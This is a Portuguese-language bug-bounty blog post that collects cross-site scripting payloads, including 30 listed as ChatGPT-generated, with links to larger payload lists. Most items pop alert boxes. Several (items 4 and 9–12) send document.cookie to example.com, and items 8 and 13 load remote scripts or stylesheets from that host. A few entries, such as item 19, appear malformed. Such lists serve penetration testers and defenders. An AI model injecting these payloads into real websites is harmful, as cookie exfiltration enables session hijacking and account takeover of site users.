Coleção de Payloads para XSS

459 views
2 mins read

XSS Payload lists:

1 – Ghetto Bypass

2 – Payloadbox

3 – @PortSwigger – XSS Cheat Sheet

30 Payloads XSS exclusivos e codificados gerados pelo ChatGPT

  1. <img src=”x” onerror=”alert(1)”>
  2. <a href=”javascript:alert(1)”>XSS</a>
  3. <body onload=”alert(1)”>
  4. <script>document.write(‘<img src=”http://example.com/xss.png?c=’ + document.cookie + ‘”>’)</script>
  5. <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
  6. <img src=”x” onerror=”eval(atob(‘YWxlcnQoMSk=’))”>
  7. <script>var a=document.createElement(“a”);a.href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”;a.click();</script>
  8. <script>var s=document.createElement(“script”);s.src=”http://example.com/xss.js”;document.body.appendChild(s);</script>
  9. <script>var i=new Image();i.src=”http://example.com/xss.png?c=”+document.cookie;document.body.appendChild(i);</script>
  10. <script>fetch(“http://example.com/xss.php?c=”+document.cookie);</script>
  11. <script>var x=new XMLHttpRequest();x.open(“GET”,”http://example.com/xss.php?c=”+document.cookie,true);x.send();</script>
  12. <script>var s=document.createElement(“iframe”);s.src=”http://example.com/xss.php?c=”+document.cookie;document.body.appendChild(s);</script>
  13. <script>var l=document.createElement(“link”);l.rel=”stylesheet”;l.href=”http://example.com/xss.css”;document.head.appendChild(l);</script>
  14. &#x3C;img src=x onerror=alert(‘Payload1’)&#x3E;
  15. &#x3C;svg onload=alert(‘Payload2’)&#x3E;
  16. &#x3C;object data=javascript:alert(‘Payload3’)&#x3E;
  17. &#x3C;body onload=alert(‘Payload4’)&#x3E;
  18. &#x3C;img src=x:alert(alt) onerror=eval(src) alt=’Payload5’&#x3E;
  19. &#x3C;script&#x3E;eval(String.fromCharCode(97,108,101,114,116,40,39,Payload6,39,41))&#x3C;/script&#x3E;
  20. &#x3C;!–%2Balert(‘Payload7’)%2B–&#x3E;
  21. &#x3C;style&#x3E;*{x:expression(alert(‘Payload8’))}&#x3C;/style&#x3E;
  22. &#x3C;input value=“ onfocus=alert(‘Payload9’) autofocus&#x3E;
  23. &#x3C;form&#x3E;&#x3C;button onclick=alert(‘Payload10’)&#x3E;X&#x3C;/button&#x3E;&#x3C;/form&#x3E;
  24. &#x3C;iframe src=javascript:alert(‘Payload11’)&#x3E;&#x3C;/iframe&#x3E;
  25. &#x3C;a href=javascript:alert(‘Payload12’)&#x3E;Link&#x3C;/a&#x3E;
  26. &#x3C;a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgnUGF5bG9hZDEzJyk8L3NjcmlwdD4&#x3E;Link&#x3C;/a&#x3E;
  27. &#x3C;div onmouseover=alert(‘Payload14’)&#x3E;Hover over me&#x3C;/div&#x3E;
  28. &#x3C;input type=image src=x onerror=alert(‘Payload15’)&#x3E;
  29. &#x3C;audio src=javascript:alert(‘Payload16’)&#x3E;&#x3C;/audio&#x3E;
  30. &#x3C;video src=javascript:alert(‘Payload17’)&#x3E;&#x3C;/video&#x3E;

8000+ XSS Payloads

Link para o Github: https://github.com/Aacle/xss_payload

 

 

Tags:

You might be interested in

Sou um profissional apaixonado pela área de Segurança da Informação. Sou certificado em ISO 27001, ISO 27005, LGPD e GDPR, o que me torna um Data Protection Officer (DPO) certificado. Também sou certificado CC e SSCP pelo (ISC)², bem como um AWS Practitioner. Além do meu trabalho, sou um orgulhoso pai de três filhos, um nerd, um cinéfilo, um leitor voraz e um eterno aprendiz.

View all

Deixe um comentário

Your email address will not be published.
Previous Story

Meus dois centavos: A importância de um servidor de logs
Next Story

Subdomain Takeover: A importância de monitorar e proteger seu subdomínio

Latest from BugBounty

API Pentesting

Por que a segurança da API é importante? A segurança da API envolve a segurança dos

Git Exposed

Introdução A questão da segurança na era digital tornou-se rapidamente um tema quente. Todos nós já